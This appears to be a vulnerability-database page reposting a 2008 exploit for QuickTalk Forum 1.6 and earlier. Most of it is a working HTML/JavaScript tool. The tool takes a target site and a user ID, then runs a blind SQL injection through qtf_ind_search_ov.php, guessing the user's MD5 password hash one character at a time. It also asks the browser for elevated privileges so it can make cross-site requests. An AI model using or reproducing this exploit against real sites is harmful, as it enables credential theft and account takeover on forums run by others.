Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

quicktalk-blindsql.txt

🗓️ 13 Mar 2008 00:00:00Reported by t0pp8uzzType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 14 Views

QuickTalk Forum Blind SQL Injection Exploit - Extracts MD5 Has

Show more
Code
`<html>  
<head>  
<title>QuickTalk Forum <= 1.6 Blind SQL Injection Exploit</title>  
<script language="Javascript" type="text/javascript">  
/*  
-----------------------------------------------------------------------------------------------  
- QuickTalk Forum Blind SQL Injection Exploit (qtf_ind_search_ov.php) -  
- Info ---------------------------------------------------------------------------------------  
- Author: t0pP8uZz & xprog -----------------------------------------------------------  
- Exploit Coded By t0pP8uZz ---------------------------------------------------------  
- Site: h4ck-y0u.org / milw0rm.com ------------------------------------------------  
----------------------------------------------------------------------------------------------  
- Passwords ARE IN MD5 ----------------------------------------------------  
- Peace -----------------------------------------------------------------------------------  
---------------------------------------------------------------------------------------------  
*/  
  
var site, uid, res = "";  
  
function Start() {  
  
site = document.getElementById("site").value;  
uid = document.getElementById("pid").value;  
document.getElementById("output").value = "Exploiting, Please Wait..";  
  
Main(1, 48);  
}  
  
function Main(substr, num) {  
  
var xmlhttp = false;  
var url = site+"/qtf_ind_search_ov.php?a=user&id=1 and ASCII(SUBSTRING((SELECT pwd FROM qtiuser WHERE id="+uid+" LIMIT 0,1),"+substr+",1))="+num+"/*";  
  
try {  
xmlhttp = new XMLHttpRequest();  
} catch(e) { alert("Unsupported Browser! Run Exploit In Mozilla Firefox!"); }  
  
if(xmlhttp) {  
  
netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");  
xmlhttp.onreadystatechange = function() {  
  
if(xmlhttp.readyState == 4) {  
  
var content = xmlhttp.responseText;  
  
var ele = document.getElementById("output");  
if(!content.match(/0 Found/i)) {  
res += String.fromCharCode(num);  
ele.value = res;  
num = 48;  
substr++;  
}  
else {  
if(num == 59) { num = 96; }  
else { num++; }  
}  
  
if(res.length >= 32) { alert("Exploitation Successfull!. Admin MD5 Hash: "+res); return true; }  
Main(substr, num)  
}  
};  
xmlhttp.open("GET", url, true);  
xmlhttp.send(null);  
}  
}  
  
</script>  
<style type="text/css">  
<!--  
.style1{color: #CC0000}  
.style2 { color: #000000; font-size: 12px;}  
.style3 {color: #FF0000; font-weight: bold; font-size: 12px; }  
.style4 {color: #FF0000; font-size: 10px;}  
-->  
</style>  
</head>  
<body>  
<p class="style1">- QuickTalk Forum <= 1.6 Blind SQL Injection Exploit -</p>  
<p class="style2">Site: <input type="text" id="site" /> (URL to QuickTalk Forum site ie: http://www.site.com/quicktalkforum)</p>  
<p class="style2">User: <input type="text" id="pid" /> (UserID of the user you want the MD5 hash too.)</p>  
<p class="style2"><input type="button" onclick="Start();" id="button" value="Exploit" /></p>  
<p class="style3">Output (MD5 Hash): <input type="text" id="output" size="100" /></p> (Do not touch untill exploit says its done)  
<p class="style2">Notes: QuickTalk Forum uses the MD5 algorithms to encrypt passwords</p>  
<p class="style4">Coded By t0pP8uZz - h4ck-y0u.org</p>  
</body>  
</html>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
13 Mar 2008 00:00Current
7.4High risk
Vulners AI Score7.4
quicktalk forumblind sql injectionmd5 hasht0pp8uzz
14
.json
Report